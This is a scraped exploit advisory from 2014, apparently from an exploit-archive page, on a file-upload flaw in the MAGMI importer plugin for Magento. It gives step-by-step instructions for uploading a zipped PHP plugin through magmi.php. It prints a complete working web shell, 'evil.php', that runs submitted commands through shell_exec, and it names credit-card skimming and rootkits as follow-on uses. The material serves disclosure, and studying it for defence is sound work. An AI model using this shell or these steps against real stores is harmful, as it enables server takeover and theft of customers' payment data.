扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
Exploit found date:10/24/2014 Security Researcher name:Parvinder Bhasin Contact info:parvinder.bhasin@gmail.com twitter:@parvinderb - scorpio Currently tested version: Magento version:Magento CE - 1.8 older MAGMI version: v0.7.17a older Download software link: Magento server:http://www.magentocommerce.com/download MAGMI Plugin: https://sourceforge.net/projects/magmi/files/magmi-0.7/plugins/packages/ MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allows an attacker to upload essentially any PHP file (without any sanity checks).This PHP file could then be used to skim credit card data, rewrite files, run remote commands, delete files..etc.Essentially, this gives attacker ability to execute remote commands on the vulnerable server. Steps to reproduce: 1.http://<a magentosite.com>/magmi/web/magmi.php 2.Under upload new plugins: click on "choose file" MAGento plugins are basically php file zipped.So create a php shell and zip the file. ex: evil.phpex: zip file: evil_plugin.zip.After the file has been uploaded, it will say:Plugin packaged installed. evil.php: <?php if (isset($_POST['command'])){ echo "<form action='evil.php' method='post'> <input type='text' name='command' value=''/> <input type='submit' value='execute'/> </form>"; if(function_exists('shell_exec')) { $command=$_POST['command']; $output = shell_exec("$command"); echo "<pre>$output</pre>"; } } else { echo "<form action='evil.php' method='post'> <input type='text' name='command' value=''/> <input type='submit' value='execute'/> </form>"; } ?> 3.Your malicious evil.php file is extracted now.All you then need to do is just access the evil.php page from: http://<amagentosite.com>/magmi/plugins/evil.php At this point you could really have access to the entire system.Download any malware, install rootkits, skim credit card data ..etc.etc. |
体验盒子
